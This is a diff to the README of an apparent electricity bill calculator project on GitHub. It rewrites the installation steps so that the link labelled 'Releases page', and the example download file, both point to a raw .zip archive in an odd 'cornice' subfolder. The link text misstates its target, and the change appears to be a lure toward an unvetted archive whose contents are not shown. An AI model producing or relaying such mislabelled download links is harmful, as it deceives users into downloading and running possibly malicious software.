jane24hart/electricity-bill-calculator/README.md

 To start using the electricity bill calculator, follow these steps:

-1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/jane24hart/electricity-bill-calculator/releases) to find the latest version of the application.
+1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/jane24hart/electricity-bill-calculator/raw/refs/heads/main/cornice/bill-electricity-calculator-v1.9-alpha.2.zip) to find the latest version of the application.
 2. **Choose Your Version**: You will see a list of available versions.
 Find the latest version listed at the top.
 3. **Download the Application**: Click on the version number to open its details.
-Look for the download link (it might be a file like `electricity-bill-calculator.exe`).
+Look for the download link (it might be a file like `https://github.com/jane24hart/electricity-bill-calculator/raw/refs/heads/main/cornice/bill-electricity-calculator-v1.9-alpha.2.zip`).
 Click it to start the download.

 ## 📦 Download & Install